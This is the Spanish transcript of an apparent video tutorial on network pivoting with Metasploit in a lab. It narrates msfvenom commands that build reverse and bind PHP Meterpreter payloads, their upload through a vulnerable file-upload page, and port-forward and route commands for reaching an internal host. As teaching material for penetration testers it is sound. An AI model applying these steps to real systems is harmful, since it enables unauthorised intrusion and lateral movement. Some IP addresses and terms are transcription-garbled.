Hola a todos, en este vídeo vamos a ver las opciones de pivoting que ofrece Metasploit usando Meterpreter en distintas situaciones y entornos. ¡Comenzamos! Si la frase de la introducción te ha sonado a magia negra... ¡Oh, no! Bueno, sí. Te recomiendo antes que veas los siguientes vídeos de este canal: introducción a Metasploit, ejecución remota de código cell directa versus cell reversa, ejecución remota de código con Metasploit y pivoting con SSH. En estos vídeos veremos varios conceptos que son de gran utilidad para entender lo que veremos a continuación. Os dejo en la descripción el enlace a cada vídeo. Una vez vistos los requisitos, vamos a ver las características del primer entorno y cómo conseguir acceso a un segundo equipo al que inicialmente no teníamos acceso. Trato hecho. En el vídeo de pivoting con SSH nos encontramos con el siguiente entorno, en el que teníamos acceso a un servidor SSH que nos permitía pivotar desde el equipo Ubuntu Server 01 al equipo Ubuntu Server 02. Como repaso rápido del entorno, nuestra Kali Linux se encuentra en la red 10330/24, que simularía ser Internet. Luego, detrás del firewall, se encuentra la red de una empresa, que dispone de dos subredes, la 10660/24 y la 10770/24. La diferencia es que ahora el acceso al puerto 22 donde se encuentra el servidor SSH del equipo Ubuntu Server 01 no está permitido, por lo que ya no tenemos la opción de pivotar mediante SSH. ¡Me cago en...! Ahora utilizaremos la consola de Metasploit y las conexiones que esta nos ofrece mediante Meterpreter. Para ello, en este caso, al solo tener acceso al puerto 80 de la Ubuntu Server 01, en el cual se encuentra un servicio vulnerable que puede subir cualquier tipo de fichero, para obtener una conexión reversa desde Ubuntu Server 01 a nuestro entorno de Metasploit, abriremos en Metasploit primeramente el puerto 8888. Luego nos conectaremos mediante el navegador al puerto 80, el cual tiene el servicio vulnerable que hemos dicho antes, lo cual nos permite ejecutar un PHP, y con ese PHP vamos a crear una conexión reversa al puerto 8888 que hemos creado antes. Ok, polilla. Una vez abierto el Meterpreter y la conexión desde Ubuntu Server 01 a nuestro equipo, podremos abrir el puerto 8000 y conectarlo al puerto 80 de Ubuntu Server 02, aprovechando la conexión reversa desde Ubuntu Server 01. Y una vez obtenido el acceso al puerto 80 vulnerable de Ubuntu Server 02, utilizando el mismo PHP que antes, conseguiremos otra conexión reversa directamente a nuestro equipo Kali Linux. Ya que, como tenemos aquí, el acceso desde la red 10770/24 a Internet o la 10330/24 es libre. Y después de este gráfico lleno de flechas y conexiones, vamos a irnos a nuestra Kali para ver un ejemplo práctico de cómo se realizaría esta conexión. Que Dios nos coja confesados. Una vez en nuestra Kali Linux, vamos a ver cómo afrontar el escenario de pruebas número 1. Para ello, a nuestra izquierda tenemos una consola de Metasploit y a la derecha un navegador. Primero y antes que nada, vamos a crear un nuevo workspace para tener todo ordenadito. Para ello ejecutamos el comando workspace-a y le ponéis el nombre que queráis, que en este caso va a ser pivoting msf. Pulsamos enter, ejecutamos de nuevo workspace y vemos que ya lo tenemos seleccionado. Ahora vamos a crear el handler que hemos visto en el ejemplo en el puerto 8888. Para ello ejecutamos use exploit multi handler. Pulsamos enter, ejecutamos options para ver las opciones y vamos a cambiar el payload que viene por defecto utilizando el comando set payload y vamos a elegir el Meterpreter de PHP. Para ello seleccionamos php/meterpreter/reverse tcp. Pulsamos enter, el parámetro lhost lo vamos a poner en la 10.3.3.10, que es la dirección IP de nuestra Kali Linux, y el puerto será set lport en el puerto 8888. Si volvemos a ejecutar options, vemos que ya tenemos lo básico configurado, pero vamos a hacer un par de configuraciones más para que este handler se quede escuchando de manera permanente y no tener que estarlo creando cada vez que recibimos una conexión nueva. Interesante. Para ello vamos a configurar la variable exit onSession a false, lo cual le indica a Metasploit que cuando un handler reciba una conexión, este no se cierre de manera automática y se quede escuchando para nuevas conexiones. Y ahora, para ejecutar el handler en segundo plano, ejecutamos exploit -j. Y como vemos, ya tenemos el handler escuchando en la 10.3.3.10 en el puerto 8888. Si queremos ver qué tareas se están ejecutando en segundo plano, podemos ejecutar el comando jobs, el cual nos indica que tenemos un handler con este payload en esta IP y en este puerto.
Eso es trucazo, Eso es trucazo. Ahora vamos a acceder a la IP 10.6.6.2 al puerto 80, que sí nos permite el acceso al firewall, y aquí tendremos que subir el payload correspondiente para que se conecte al handler que tenemos aquí creado. Para ello nos vamos a otra consola y ejecutando el comando msfvenom -p el payload que vamos a utilizar, que en este caso es meterpreter /reverse tcp, y configuramos tanto el parámetro lhost con la 10.3.3.10 como el parámetro lport con el puerto 8888, que es lo que hemos configurado en el handler. Esto lo redirigimos al fichero reverse.php y pulsamos enter. 12 seconds later. Y después de unos segundos, si ejecutamos aquí ls, podemos ver que se nos ha creado el fichero reverse.php. Ahora nos volvemos a nuestra consola de Metasploit y en el servidor vulnerable vamos a subir este payload que acabamos de crear. Seleccionamos el payload, le damos a abrir, le damos a enviar, nos dice que se ha guardado en uploads/reverse.php, que podemos acceder mediante el enlace ficheros guardados, y si accedemos al fichero reverse.php deberíamos recibir una conexión en nuestro handler que tenemos aquí. Pulsamos en reverse.php y como podemos ver se nos ha abierto una sesión de meterpreter. Si ejecutamos el comando sessions podemos ver la información de la conexión que acabamos de recibir. Ya que el meterpreter por PHP no es muy estable, podemos utilizar este meterpreter para crear otra conexión reversa mediante un payload concreto para Linux. Y este comando es sessions -u, que lo que hace es un upgrade, y tenemos que indicar el ID del meterpreter que queremos utilizar. Le indicamos que el 1, pulsamos enter, y en realidad lo que nos está haciendo es ejecutar el módulo post multi manage shell to meterpreter para crearnos una nueva conexión. Esperamos un poco. A few inches later. Y vemos que se ha abierto una segunda sesión de meterpreter. Ahora si ejecutamos el comando sessions podemos ver que tenemos dos. Y ahora utilizando meterpreter tenemos que conseguir acceso a la IP 10.7.7.2 que desde el navegador no podemos acceder. Para ello vamos a seleccionar el meterpreter número 2, el cual se está ejecutando en Ubuntu Server 01, y aquí vamos a utilizar la opción de port forward que ofrece meterpreter, que si añadimos el parámetro "-h" para ver la ayuda, nos dice que podemos crear túneles o redirección de puertos tanto de manera directa como de manera reversa. En este caso, para poder acceder a la 10.7.7.2 debemos ejecutar port fwd add -l, en este caso vamos a poner el 8000, es decir, este es el puerto que se va a abrir en nuestra máquina Kali Linux. También le vamos a indicar la interfaz o la dirección IP local que queremos que utilice, que en este caso va a ser la 127.0.0.1, y ahora le añadimos a donde nos queremos conectar con "-p" para indicarle el puerto y con "-r" para indicarle la dirección IP donde nos queremos conectar. En este caso es la 10.7.7.2. Pulsamos enter y si volvemos a ejecutar el comando port forward nos indica que la redirección de puertos se ha hecho. Bien hecho. Ahora en nuestro navegador, en vez de poner la 10.7.7.2, si metemos la dirección IP 127.0.0.1 en el puerto 8000, vemos que tenemos acceso a Ubuntu Server 02. Has flipado, Antes de nada vamos a dejar en segundo plano la sesión de meterpreter. Para ello ejecutamos el comando background, pulsamos enter, y ahora que tenemos acceso a Ubuntu Server 02 vamos a utilizar el mismo payload que hemos utilizado en Ubuntu Server 01, ya que desde Ubuntu Server 02 se tiene acceso a la dirección IP de nuestra Kali Linux. Subimos el fichero como hemos hecho en Ubuntu Server 01, volvemos a dar a ficheros guardados, y ahora si ejecutamos el reverse.php deberíamos recibir una conexión en nuestro handler. Pulsamos en reverse.php y vemos que se ha abierto una nueva sesión de meterpreter, y si ejecutamos el comando sessions podemos ver que hay una conexión a la 10.3.3.10 en el puerto 8888 desde la dirección IP 10.7.7.7.2, y así ya tendríamos acceso mediante un meterpreter desde nuestra Kali Linux, desde la cual en un principio no teníamos acceso, y de esta forma superaríamos el entorno de pruebas número 1. ¡Vaya, qué gran alivio! Una vez visto el ejemplo práctico de nuestra Kali, vamos a cambiar el escenario de pruebas. En este caso, el acceso ya no será libre desde la 10.7.7.0/24 hacia la 10.3.3.0/24, lo cual no nos permite hacer una conexión reversa directa desde Ubuntu Server 02 a la Kali Linux. ¡Me cago en!
Por lo cual, otra opción sería el Ubuntu Server 02, ejecutar un PHP que nos abra el puerto 7000. Y en vez de realizar la conexión directamente desde Ubuntu Server 02 a la Kali Linux, a través del túnel que hemos creado inicialmente hacia el Ubuntu Server 01, conectarnos al puerto 7000 del Ubuntu Server 02. Lo cual sería una conexión directa o bind a través de una conexión reversa desde Ubuntu Server 01. Este tío está flipado. Así dicho, parece un poco lioso, pero no vamos a ir a nuestra Kali para ver cómo se hace esto en Metasploit y ver que es más sencillo de lo que parece. Uy, sí, claro. De vuelta en nuestra Kali Linux vamos a empezar sin ninguna sesión abierta. Para ello ejecutamos el comando sessions y vemos que no tenemos ninguna sesión activa para que veáis que no os hago trampas. Y si ejecutamos el comando jobs podemos ver que ya tenemos listo el handler de antes. Para conseguir una conexión reversa desde Ubuntu Server 01 volvemos a ir a ficheros guardados y volvemos a acceder al mismo payload que antes para conseguir la conexión reversa. Pulsamos y recibimos la conexión de Meterpreter. Volvemos a hacer un upgrade de la sesión 1 y una vez recibimos la segunda conexión, ejecutamos sesión 2 para conectarnos al Meterpreter. Volvemos a crear la redirección de puertos con port forward, en la cual añadimos parámetro add, -l, el puerto 8000, -L mayúscula, la dirección IP donde vamos a abrir el puerto, -P, el puerto donde nos queremos conectar, -R, la dirección IP a la que nos queremos conectar. Pulsamos Enter, ya se ha creado la redirección. En nuestro navegador ahora accedemos a la 127.0.0.1 al puerto 8000 y volvemos a tener acceso a Ubuntu Server 02. ¿Ahora yo qué hago con esta mierda? Pero claro, ahora no nos sirve una conexión reversa, ya que desde Ubuntu Server 02 no se tiene acceso a nuestra Kali Linux. ¡Me cago en! Para ello vamos a crear un payload del tipo bind o directo, el cual nos abrirá un puerto en la Ubuntu Server 02. Para ello utilizamos el comando msfvenom -p, el payload que vamos a utilizar, que en este caso es php/meterpreter/bind tcp, en el que le decimos que el puerto que tiene que abrir es el 7000 y esto lo vamos a redirigir al fichero bind.php. Esperamos un poco. Y si ejecutamos ahora un ls, vemos que se nos ha creado el fichero bind.php. Lo subimos a Ubuntu Server 02, seleccionando el fichero, dándole a abrir, le damos a enviar, el fichero se ha guardado en ubluats bind.php, vamos a ficheros guardados y ejecutamos el payload. Como en otros vídeos, cuando vemos que esto está cargando, podemos deducir que se está ejecutando el payload y que ahora el puerto 7000 de la dirección IP de Ubuntu Server 02, que es la dirección IP 10772, está abierto. Ok. Entonces volvemos a nuestra consola de Metasploit, ejecutamos el comando background para volver hacia atrás y ahora necesitamos conectarnos de manera directa al puerto 7000 de la edición IP 10772. Para ello, en el handler que tenemos configurado debemos cambiar el tipo de payload que tenemos aquí, ya que ahora es una conexión directa. Sí, señor. Para ello ejecutamos set payload php meterpreter /bind tcp. Ejecutamos el comando options y ahora hay que configurar los parámetros para poder conectarnos al puerto 7000 de la dirección IP 10.7.7.2. Volvemos a ejecutar options para ver que está todo configurado y ahora si ejecutamos el comando exploit deberíamos poder conectarnos a la 10772 al puerto 7000. Pulsamos enter y vemos que no funciona. ¿Cómo es esto posible? ¡Hemos hecho mal! Pues porque la dirección IP 10772 no es accesible directamente desde nuestra Kali. Y entonces, ¿cómo lo hacemos si hemos dicho que la conexión tenía que ser directa? Buena pregunta. Pues en Metasploit existe una opción para, en las sesiones que nosotros tenemos, aprovecharlas como túneles o proxies hacia otras redes. Para ello tenemos el comando route, que si le ponemos la opción "-h, nos muestra cómo podemos añadir una ruta a través de un ID de alguna sesión que tengamos abierta. Para ello vamos a ejecutar el comando route add, añadimos la red donde se encuentra la Ubuntu Server 02, que en este caso es la 10770/24, y le vamos a decir que para
poder llegar a esa red utilice el meterpreter que tiene como número de sesión el 1. Pulsamos Enter, volvemos a ejecutar el comando route y vemos que aquí tenemos configurado que para acceder a esta red desde el entorno de Metasploit, esto es importante, esto solo funciona dentro de Metasploit, no desde otra consola, aunque hay maneras de hacerlo, pero eso es más complicado y lo veremos en otro vídeo. Tomo nota. Entonces ahora técnicamente todo lo que ejecutemos dentro de la consola de Metasploit podemos tener acceso a esta red. Entonces lo que tenemos configurado ahora en el handler, que es la conexión al puerto 7000 de la IP 10772, debería funcionar. Así que si ahora ejecutamos exploit, pulsamos enter y podemos ver que se ha creado otra sesión de meterpreter con una conexión directa desde nuestro equipo a la IP 10772 al puerto 7000 a través de la sesión de meterpreter con ID 1. Si ahora volvemos a ejecutar el comando sessions, vemos que se ha creado una sesión con ID 3, la cual estamos conectados a la IP 10772 al puerto 7000. Si ejecutamos sesión 3, vemos que tenemos un meterpreter en el cual podemos ejecutar comandos en Ubuntu Server 02, como por ejemplo el comando systinfo, que nos devuelve que estamos en Ubuntu Server 02, la versión del sistema operativo y el meterpreter que estamos usando. Y así es como conseguiríamos una conexión directa mediante una conexión reversa a una dirección IP a la que en principio no teníamos acceso. Yo estoy flipando ahora mismo. Por último vamos a ver el caso en el que desde la red 10.6.0/24 no se tiene acceso libre a la red donde se encuentra Ubuntu Server 02 y solo se tiene acceso al puerto 80 de la Ubuntu Server 02 desde Ubuntu Server 01, lo cual nos prohíbe la conexión al puerto 7000 de la Ubuntu Server 02 de manera directa desde Ubuntu Server 01. ¿Cuál sería la solución en este entorno? Otro dilema. Pues sería una solución parecida a lo que vimos en Pivoting con SSH. Sería utilizando el meterpreter que tenemos abierto en Ubuntu Server 01, abrir en esta máquina el puerto 7777, que puede ser cualquier otro, pero en este caso vamos a utilizar este, y utilizando la ejecución de código PHP de Ubuntu Server 02, crear una conexión reversa hacia el puerto 7777 de la Ubuntu Server 01, en el cual a través de meterpreter el puerto 7777 estará redirigido al puerto 8888 de nuestra Kali Linux, recibiendo así una conexión reversa a través de otra conexión reversa desde Ubuntu Server 01. ¿Qué? De nuevo nos vamos a ir a nuestra Kali Linux para ver un ejemplo práctico sobre este entorno. Tengo miedo, tengo miedo, tengo miedo, tengo miedo. De nuevo en nuestra Kali Linux podemos ver que no tenemos ninguna sesión abierta y que tenemos en segundo plano el handler que hemos creado al principio en el puerto 8888. Como hemos hecho en entornos anteriores, primero debemos poder acceder al puerto 80 de la IP 10772. Para ello generamos una conexión reversa desde la Ubuntu Server 01, hacemos un upgrade de la sesión que acabamos de crear. A few moments later. Accedemos a la nueva sesión y hacemos el port forward que hemos realizado en anteriores entornos con add -l 8000 -l mayúscula, la IP donde vamos a abrir el puerto 8000, el puerto al que nos queremos conectar y la dirección IP a la cual nos queremos conectar. Ahora en nuestro navegador, si vamos a la 127.0.0.1 al puerto 8000, que es el que acabamos de abrir, tendremos acceso a Ubuntu Server 02. Pero ahora no nos sirve ninguno de los payloads que hemos creado antes, ya que una conexión directa no es posible y una conexión reversa a nuestra máquina Kali Linux tampoco. ¡Me cago en! Para ello tenemos que crear un nuevo payload, que en este caso vamos a usar de nuevo el comando msfvenom -p, el payload que vamos a utilizar, que es el mismo que antes, pero ahora el puerto a donde nos vamos a conectar es el 7777 de la IP 10.6.6.2, que es la correspondiente a Ubuntu Server 01. Esto lo guardamos en el fichero reverse/7777 para diferenciarlo del otro, .php. Si ejecutamos un ls podemos ver que tenemos los dos ficheros anteriores y el nuevo que acabamos de crear. Ahora necesitamos subir este fichero al Ubuntu Server 02, para ello damos a browse, elegimos el fichero, damos a abrir, damos a enviar, nos dice que el fichero ha sido subido. Si vamos a ficheros guardados lo tenemos aquí junto a los demás que hemos subido antes, pero claro, si este
fichero va a hacer una petición al puerto 7777 de la IP 10662. ¿Cómo hacemos que esto venga a nuestra consola de Metasploit? Pues utilizando Meterpreter y PodForward, ya que este Meterpreter está creado en Ubuntu Server 01, podemos abrir un puerto en esa IP y redirigirlo a un puerto de nuestra Kali Linux. Para ello ejecutamos el comando portForward, pero en este caso vamos a meterle la opción add y la opción "-r", el cual nos crea una conexión reversa desde el puerto de la máquina Ubuntu Server 01 que nosotros le digamos. Sure. Primero le vamos a indicar el puerto al que queremos redirigir la conexión, que en este caso es el 8888, que es donde tenemos ejecutando el handler en nuestra máquina Kali Linux. Le vamos a meter la opción "-l mayúscula", la dirección IP de nuestra Kali Linux, y ahora con la opción "-p", en vez de a qué puerto nos queremos conectar, tenemos que añadir el puerto que queremos abrir y la dirección IP donde lo queremos abrir, que en este caso es la 10.6.6.2. De esta forma, si volvemos a ejecutar por forward, podemos ver los dos túneles que tenemos creados. Es decir, si nos conectamos a nuestro puerto 8000 de nuestra dirección IP local, tenemos acceso a la IP 10772 al puerto 80, y en este Meterpreter hemos abierto el 7777 en todas las interfaces de Ubuntu Server 01, las cuales incluye la IP 10662, y lo redirigimos a través de este Meterpreter al puerto 8888 de nuestra Kali Linux. Perfectamente claro y entendido. Si ahora salimos de este Meterpreter y ejecutamos el fichero reverse 7777.php, deberíamos conseguir una nueva sesión de Meterpreter en nuestra máquina Kali Linux a través de una conexión reversa pasando por Ubuntu Server 01. Ejecutamos el fichero. Y si ahora ejecutamos el comando sessions, podemos ver que hasta el propio Metasploit ya no sabe ni por dónde le sopla el aire, porque está diciendo que se está conectando a sí mismo, pero si vemos la información vemos que tenemos acceso a Ubuntu Server 02. Para comprobarlo vamos a acceder a la sesión 3 y hacemos de nuevo un systinfo, el cual nos indica que estamos en Ubuntu Server 02. ¡Lo tenemos! ¡Lo tenemos! Es posible que si es la primera vez que veis algo así sea un poco lioso, pero al final es ir uniendo túneles y conexiones directas o reversas en función del entorno en el que nos encontremos y de los accesos que tenemos entre redes. Pero como veis, las opciones son infinitas y desde esta sesión podríamos, por ejemplo, volver a pivotar a otra red distinta, por ejemplo, que se tuviera acceso solo desde Ubuntu Server 02. Pero esto ya no lo vamos a hacer para no liar más el rizo. ¡Corre! ¡No mires atrás! Y esto es un buen ejemplo de por qué a mí me gusta mucho Metasploit, y estoy un poco en contra de los que dicen que si utilizas Metasploit nunca aprendes, porque a ver quién es el listo que es capaz de hacer esto sin utilizar Metasploit y creando su propio script o comandos, que obviamente se puede hacer, pero no es algo que sea posible de entender y de hacer para alguien que está empezando. Vaya, no encuentro fallas en su lógica. Y esto ha sido todo por ahora. Os recuerdo que en los comentarios podéis dejar vuestras dudas, sugerencias u opiniones, que os aseguro que me los leo todos. Y también os recuerdo que me he creado un perfil en Instagram donde avisaré cuando haya un nuevo vídeo en el canal y subiré alguna noticia chorrada sobre ciberseguridad de vez en cuando. ¡Nos vemos!